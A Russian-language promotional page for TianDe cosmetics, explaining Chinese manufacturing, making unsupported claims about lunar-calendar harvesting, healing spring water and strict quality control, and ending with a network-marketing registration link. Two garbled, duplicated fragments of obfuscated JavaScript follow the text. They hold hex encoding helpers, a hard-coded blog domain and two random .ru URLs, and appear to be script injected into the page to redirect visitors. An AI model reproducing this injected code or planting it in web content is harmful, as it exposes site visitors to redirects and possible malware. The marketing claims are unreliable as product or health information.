Почему производство TianDe в Китае!

картинки китайО производстве продукции!

Почему производство Tiande в том числе и в Китае?

Причина этого — в сочетании качества,  стоимости,  в том числе и современных инноваций.

КАЧЕСТВО, СТОИМОСТЬ И СОВРЕМЕННЫЕ ИННОВАЦИИ.

В настоящее время Китай является мировой фабрикой продукции. Причина этого в высочайшей эффективности и минимальной стоимости производства.

Косметический рынок Китая — один из самых быстро растущих в мире. Все крупнейшие мировые бренды давно уже закупают или компоненты своей продукции, или перенесли свое производство в Китай. По эффективности производства, а значит и низкой стоимости производимой продукции, производимая в Китае продукция вне конкуренции.

Производители Китая используют преимущество сочетания традиций, умелого использования богатств природы и современных технологий. Именно поэтому партнеры Компании TianDe — производители Китая, признанные мировым деловым сообществом. Производится строжайший контроль качества. Подчеркнем Компания работает только с заводами, имеющими международные сертификаты качества ISO (International Standart Organization).

В рецептуре косметичечских средств широко применяются секреты китайских целителей.

При изготовление Компания Тианде применяет только высококачественное сырье-растения, которые выращиваются в естественных условиях, в экологически чистых зонах Китая и Тибета, и собираются, специально обученными людьми в строго определенное время согласно лунному календарю. Даже вода, используемая в косметических средствах, добывается в целебных источников из морских глубин. Попадая в лабораторию, все ингридиенты проходят многоступенчатаю систему контроля и очистки и только затем попадают на конвйер. Компания TianDe сотрудничает с ведущими научными лабораториями и косметолагами — экспертами в России и Китае, центрами сертификации и контроля качества, признанными авторитетами в области косметологии.

Сегодня компания TianDe — представляет уникальную коллекцию косметических средств, созданных по традиционным канонам китайской медицины с использованием новейших достижений науки и прогрессивных технологий. Успех нашей компании гарантирует высочайшее качество косметических препаратов и оптимальные условия ведения бизнеса.

РЕГИСТРАЦИЯ В КОРПОРАЦИИ ПО ССЫЛКЕ: http://start.obc24.com/~6l8s6

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «shafrannikova.wordpress.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "shafrannikova.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698